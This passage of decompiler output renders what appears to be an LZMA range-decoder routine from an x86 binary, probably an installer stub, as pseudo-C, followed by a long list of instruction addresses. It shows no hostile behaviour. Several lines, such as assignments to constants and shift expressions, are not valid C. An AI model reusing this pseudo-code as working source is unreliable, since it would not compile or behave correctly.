											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d91
                                                        0x00406d95
                                                        0x00406d99
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00000000
                                                        0x00000000
                                                        0x004070c4
                                                        0x004070cd
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x0040711b
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040711d
                                                        0x0040711d
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x004071d2
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x004070a0
                                                        0x004070a6
                                                        0x004070ad
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x00000000
                                                        0x004070b8
                                                        0x00407122
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f0
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fa
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406855
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x0040689f
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068c9
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x0040690f
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x0040701d
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
